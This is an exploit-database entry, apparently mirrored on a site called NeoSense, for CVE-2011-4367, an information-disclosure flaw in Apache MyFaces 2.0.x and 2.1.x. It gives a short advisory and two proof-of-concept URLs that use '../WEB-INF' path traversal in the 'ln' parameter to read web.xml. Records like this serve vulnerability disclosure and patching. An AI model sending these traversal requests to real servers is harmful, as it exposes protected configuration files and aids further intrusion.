[] NeoSense
E X P L O I T S
title author type platform port cve id

Apache MyFaces - 'ln' Information Disclosure

Author: Paul Nicolucci
type: remote
platform: multiple
port: 
date_added: 2012-02-09 
date_updated: 2015-04-09 
verified: 1 
codes: CVE-2011-4367;OSVDB-79002 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/51939/info

Apache MyFaces is prone to a remote information-disclosure vulnerability.

Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.

The following versions are affected:

Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5

http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.